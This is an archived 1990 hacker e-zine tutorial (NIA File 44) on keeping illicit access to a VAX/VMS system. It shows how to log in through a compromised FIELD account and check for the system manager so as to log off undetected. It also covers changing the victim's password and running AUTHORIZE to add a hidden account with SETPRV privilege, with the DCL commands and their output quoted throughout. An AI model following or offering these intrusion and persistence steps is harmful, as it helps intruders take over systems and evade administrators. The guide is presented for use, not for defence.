home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / hack / nia / nia044.txt < prev    next >
Text File  |  1995-11-30  |  10KB  |  270 lines

  1.   ┌──────────────────┐ ╔═══════════════════════════════╗ ┌──────────────────┐
  2.   │   Founded By:    │ ║  Network Information Access   ║ │   Founded By:    │
  3.   │ Guardian Of Time │─║            09AUG90            ║─│ Guardian Of Time │
  4.   │   Judge Dredd    │ ║       Guardian Of Time        ║ │   Judge Dredd    │
  5.   └────────┬─────────┘ ║            File 44            ║ └─────────┬────────┘
  6.            │           ╚═══════════════════════════════╝           │
  7.            │         ╔═══════════════════════════════════╗         │
  8.            └─────────╢Creating An Account On A VMS System╟─────────┘
  9.                      ╚═══════════════════════════════════╝
  10.  
  11. I will be using the FIELD account for my tutorial.  The FIELD account has
  12. SETPRV capability which means, that that particular account can create other
  13. accounts and set its own privliges.  If the account which you have does NOT
  14. have that capability you can NOT create (to my limited DCL Experience)
  15. accounts.
  16.  
  17. [===========================]
  18.  
  19. $_LOGGING IN
  20.  
  21. Username:FIELD
  22. Password:
  23.  
  24. Welcome to NIA ... VAX/VMS Version 5.04
  25.  
  26. Last Interactive login on Monday, 6-AUG-1990 17:45
  27. $
  28.  
  29. The ($) Dollar Sign means that you are at the DCL Prompt or the DIGITAL
  30. COMMAND LANGUAGE prompt. You have access to over 200+ Commands to do
  31. virtually anything you want.  Assuming that your Account has the access.
  32.  
  33. Also keep an eye out when you log in, to see who-else is attempting to hack
  34. that account.  The system will automatically tell you each time that you log
  35. in, how many "Hack" attempts there have been attempted on that account.
  36.  
  37. [============================]
  38.  
  39. $_SHOW USERS
  40.  
  41.  
  42. The VERY NEXT thing that you should do, is to check for other users.  This
  43. is a very good habit to get into, for the following example will show you
  44. WHY you should do so:
  45.  
  46. $SH USERS
  47.  
  48. VAX/VMS Interactive Users
  49. 6-AUG-1990 17:56:54.42
  50. Total number of interactive users = 6
  51.  
  52. Username       Process Name     PID              TERMINAL
  53. FIELD          FIELD            000000AF         VTA89:
  54. MANAGER        MANAGER          00000146         OPA0:
  55.  
  56. Notice that the MANAGER is on, now, depending on how active this person is,
  57. or not, you MIGHT ( NOTICE MIGHT ), be able to slip by him and not be
  58. detected, but I doubt that.  If you EVER see the MANAGER account on,
  59. LO/HANGUP Imediately, that way, you can come back at a later time.
  60.  
  61. Also note that just because the MANAGER is on, it doesn't mean that he is
  62. actually on the system.  The terminal can be logged on, and nothing
  63. happening, some system managers do this, in an effert to scare hackers away.
  64.  
  65.  
  66. [===========================]
  67.  
  68. $_PASSWORD CHANGE
  69.  
  70. Once you get yourself an account, be sure to CHANGE THE PASSWORD, this is
  71. good to keep the other guy out or to make enough time to create yourself another
  72. account or just so that it looks normal.  Some system managers may have DCL
  73. set up to automatically change your PW after 30 days, so if you come across
  74. something that says to change your password do it.  B/c if you do not change
  75. your password, you will lock yourself out of the system.  Also make a note
  76. that SOME accounts have a time period on them ( Univiversities SHOULD have
  77. this, for thier students ), if you get ahold of such an account, make a note
  78. that the system will NOT notify you that your account is about to go dead.
  79.  
  80. When changing your password make sure that the words you use, do NOT in any
  81. way correspond to YOU.  Meaning that if you smoke do NOT use your brand of
  82. cigarretes as a password.  You want to be as NON-DESCRIPTIVE as possible, so
  83. as not to give the system manager any "clues" that maybe used against you
  84. later on.
  85.  
  86. To change your password:
  87.  
  88. $ SET PASSWORD:
  89. $ OLD PASSWORD: GUARDIAN
  90. $ NEW PASSWORD: DREDD
  91.  
  92. The MANAGER account can determine how many characters YOUR password can be.
  93. So if you get a message stating that  your password is not long enough you
  94. should just make sure you have enough characters.  The message you would get
  95. looks like this:
  96.  
  97. $SET PASS
  98. Old password:
  99. New password:
  100. %SET-E-INVPWDLEN, minimum password length is 8; password not changed
  101. $
  102.  
  103. You can also have the system generate a password for you.  The following
  104. example shows how to change the password, for account FIELD with a password
  105. length of eight.  There are only five passwords listed, what the system will
  106. do is to list on the left the password and then on the right side is the
  107. same password broken down into syllables.  Generaly the easier to say
  108. (syllable wise) is the one chosen.
  109.  
  110. Username:FIELD
  111. Password:
  112.  
  113. Welcome to NIA ... VAX/VMS Version 5.04
  114.  
  115. Last Interactive login on Monday, 6-AUG-1990 17:45
  116. $SET PASS/GENERATE=8
  117. Old password:
  118.  
  119. apsjawpha     aps-jaw-pha
  120. oorsoult      oor-soult
  121. guamixexab    gu-a-mix-ex-ab
  122. impsapoc      imps-a-poc
  123. ukchfgoy      uk-chaf-goy
  124.  
  125. Choose a password from this list or press RETURN to get a new list
  126. New password:
  127.  
  128. Verification:
  129. $
  130.  
  131. According to the manual (Page 3-9 Security For The User 3.1 Logging In to
  132. the System ), there is a wonderful highlighted message that I think you will
  133. get a kick out of:
  134.  
  135. NOTE: THE PASSWORD GENERATOR USES BASIC SYLLABIC RULES TO GENERATE WORDS,
  136. BUT HAS NO REAL KNOWLEDGE OF ANY LANGUAGE.  AS A RESULT, IT MAY
  137. UNINTENTIONALLY PRODUCE WORDS THAT ARE OFFENSIVE.
  138.  
  139. [============================]
  140.  
  141. $_Creating User Accounts
  142.  
  143. To begin your creating of an account you must determine if you have SETPRV
  144. capability, if you do not, then your wasting your time.  That is why it is
  145. IMPERITIVE that you get an account with SETPRV privilege.
  146.  
  147. To find out if your account has SETPRV privilege, you just switch to the
  148. SYS$SYSTEM directory and RUN AUTHORIZE, if you can run authorize, then you
  149. should have the access.  But to be certain once you are in the UAF (User
  150. Authorization File), you can then type SH FIELD/FULL (or SH username/FULL,
  151. username would be the name of your account.) and look under privilege if you
  152. have SETPRV your set, if not tough.  Basically with my limited knowledge that
  153. is 'bout all I know, on how to check if you have access or not.  If there is a
  154. quicker/better way, I do NOT know.  I only just started to dabble in the
  155. Digital Command Language (DCL).
  156.  
  157. Once you have dialed into a system, and you are at the DCL prompt, just
  158. follow the below format and you should have no problem.
  159.  
  160. $SET DEFAULT SYS$SYSTEM
  161. $RUN AUTHORIZE
  162. UAF> ADD NIA/PASSWORD="WAXYOLWOS" -
  163. UAF> /DEVICE=SYS$SYSDEVICE/DIRECTORY=[SYS$SYSTEM] -
  164. UAF> /PWDLIFETIME=30-/PWMINIMUM=8 -
  165. UAF> /PRIVILEGES=SETPRV
  166. %UAF-I-ADDMSG, user record successfully added
  167. UAF> *EXIT*
  168. %UAF-I-DONEMSG, system authorization file modified
  169. %UAF-I-RDBNOMODS, Modifications made to rights database
  170. $ LO/HANGUP
  171.  
  172. Username:
  173. Username: NIA
  174. password: xxxxxxxxx <- Passwords are NEVER echoed back to you by the system
  175.  
  176. Welcome to NIA... VAX/VMS Version 4.7
  177.  
  178. $
  179.  
  180. We will go over the UAF> section, since most of the rest seems easy enough
  181. to follow and to handle.  UAF stands for User Authorization File.
  182.  
  183. $RUN AUTHORIZE
  184. UAF> ADD NIA/PASSWORD="WAXYOLWOS" -
  185.  
  186. You are now creating you User Account, which is NIA and assigning yourself a
  187. password that is nine digits long.  The - on the end, means more to follow.
  188.  
  189. UAF> /DEVICE=SYS$SYSDEVICE/DIRECTORY=[SYS$SYSTEM] -
  190.  
  191. Now you are assigning to your account a directory in which to create files.
  192. That should be the root of the system, so there should be around 366 or more
  193. files there.  Also if you do NOT assign yourself a directory, the system will
  194. still let you log into it.  But you will not be able to create any files or
  195. such, unless you are in a specific directory.
  196.  
  197. UAF> /PWLIFETIME=30-/PWMINIMUM=8 -
  198.  
  199. The password will automatically expire in thirty days.  The system will
  200. notify you when your password is due for change.  If you do NOT change it,
  201. you will be locked out of the system, till the manager re-assigns you a
  202. password.  So if you are told to change a password DO IT.
  203.  
  204. The password length must be at least eight characters long.  Where the eight is
  205. you can make that number whatever you want, just as long as you remember that
  206. that is the MINIMUM length of your password.  The longer your password is, the
  207. longer it is for you remember, write down, macro in, whatever.  Just remember
  208. to keep that passsword.  If you lose it, you will in turn lock yourself out of
  209. the system you are hacking.
  210.  
  211. UAF> /PRIVILEGES=SETPRV
  212.  
  213. This is the Privilege that you want.  The command SETPRV will allow your
  214. account to activate any other privilege that there is.  This probably the
  215. most dangerous command to give out.  Make sure your account has it.
  216.  
  217. UAF> *EXIT*
  218.  
  219. That is a control Z, and that will always let you out of the "program" and
  220. back into DCL.
  221.  
  222. If your account does NOT have access to create an account (SETPRV Privilege)
  223. and you attempt to create an account you will get the following error
  224. message:
  225.  
  226. $SET DEFAULT SYS$SYSTEM
  227. $RUN AUTHORIZE
  228. %UAF-E-NAOFIL, unable to open SYSUAF.DAT
  229. -RMS-E-PRV, insufficient privilege or file protection violation
  230. $
  231.  
  232. Which means your NOT entering the UAF program.
  233.  
  234. [============================]
  235.  
  236. $_HINTS
  237.  
  238. Remember that if you are ever stuck just type the word HELP.  Vax's are
  239. set up so that just about every command has its own HELP TOPIC.  Also you
  240. might have seen files that show all of DCL's commands?  You can type the
  241. command HELP *(return) and that will give you a list of all the HELP TOPICS
  242. and what they cover.  Problem is, almost all HELP TOPICS have SUB HELP TOPICS,
  243. and those are NOT listed when you do a HELP *.  Also some HELP TOPICS have
  244. references and such, and those too, are not listed, unless, you specify it.
  245.  
  246. You do not have to type the entire command out, you can be pretty
  247. descriptive and if you become to descriptive the system will tell you that
  248. it doesn't recognize the command but for your references Commands can be
  249. shortened, for example:
  250.  
  251. $SHOW USERS
  252.  
  253. Can be typed as:
  254.  
  255. $SH U
  256.  
  257. You need to SHO U often.  This way you will be able to LO/HANGUP if you see
  258. the MANAGER account logged on.
  259.  
  260. Common Commands to use:
  261.  
  262. Control-Z := EXIT this will return you back to DCL Prompt ($)
  263. Up/Down   := Repeat Last Command
  264. SH U      := Show Users ( USE Periodically )
  265. LO        := Logoff, you have three Qualifiers for logging off
  266. HELP      := Help Topics, example HELP SHOW or HELP LOGOFF or HELP
  267.  
  268. $_NIA END OF FILE
  269.  
  270.